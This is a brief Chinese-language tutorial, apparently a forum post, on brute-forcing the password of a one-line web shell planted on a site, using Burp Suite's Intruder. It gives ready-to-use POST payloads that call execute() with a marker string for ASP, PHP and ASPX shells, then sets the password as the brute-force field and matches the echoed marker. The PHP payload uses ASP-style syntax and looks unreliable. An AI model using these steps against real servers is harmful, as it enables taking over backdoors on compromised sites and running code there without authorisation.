|
如一句话地址:www.xxx.com/a.asp
(1)利用burp截包,转get的方式为post方式,添加POST数据如下:
asp password=execute("response.clear:response.write(""passwordright""):response.end")
php password=execute("response.clear:response.write(""elseHelloWorld""):response.end")
aspx password=execute("response.clear:response.write(""elseHelloWorld""):response.end")
其中password是要添加的字典!
(2)转到Intruter,设置password为爆破字段:$password$
(3)match添加
asp为 passwordright,
php和aspx为 elseHelloWorld
(4)attack即可! | 
转播
